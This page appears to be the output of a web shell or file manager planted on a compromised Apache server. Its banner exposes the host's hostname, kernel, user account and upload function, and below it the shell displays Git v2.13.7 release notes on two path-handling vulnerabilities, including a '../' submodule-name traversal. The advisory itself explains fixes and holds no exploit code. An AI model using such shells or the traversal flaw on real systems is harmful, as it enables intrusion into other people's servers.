HEX
Server: Apache/2.4.62 (Unix) OpenSSL/1.1.1k
System: Linux ns565604.ip-54-39-133.net 4.18.0-553.50.1.el8_10.x86_64 #1 SMP Tue Apr 15 08:09:22 EDT 2025 x86_64
User: greer489 (1034)
PHP: 8.3.19
Disabled: NONE
$ pwd: /usr/share/doc/git/RelNotes/
Upload Files
File: //usr/share/doc/git/RelNotes/2.13.7.txt
Git v2.13.7 Release Notes
=========================

Fixes since v2.13.6
-------------------

 * Submodule "names" come from the untrusted .gitmodules file, but we
   blindly append them to $GIT_DIR/modules to create our on-disk repo
   paths. This means you can do bad things by putting "../" into the
   name. We now enforce some rules for submodule names which will cause
   Git to ignore these malicious names (CVE-2018-11235).

   Credit for finding this vulnerability and the proof of concept from
   which the test script was adapted goes to Etienne Stalmans.

 * It was possible to trick the code that sanity-checks paths on NTFS
   into reading random piece of memory (CVE-2018-11233).

Credit for fixing for these bugs goes to Jeff King, Johannes
Schindelin and others.
@ Telegram